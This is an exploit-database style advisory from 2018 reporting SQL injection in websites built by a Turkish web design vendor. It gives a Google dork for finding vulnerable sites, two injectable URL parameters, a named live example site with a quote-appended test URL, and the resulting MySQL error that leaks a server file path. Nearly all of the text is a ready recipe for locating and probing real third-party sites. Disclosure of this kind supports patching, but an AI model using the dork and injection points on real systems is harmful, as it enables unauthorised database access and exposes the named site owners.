#################################################################################################
# Exploit Title : MTPReklam Kornea Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : mtpreklam.com ~ kornea.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:mtpreklam
# Exploit :
/urundetaylari.php?urunid=[SQL Injection]
/mobil/ilan-detay.php?id=[SQL Injection]
#################################################################################################
# Example Site => solmazemlak.com.tr/urundetaylari.php?urunid=204%27 => [ Proof of Concept ] => archive.is/2J1wz
# SQL Database Error =>
[You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' at line 1]
Warning: mktime() expects parameter 6 to be long, string given in /home/pursakla/domains/pursaklaremlak.net/public_html/mobil/ilan-detay.php on line 65
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################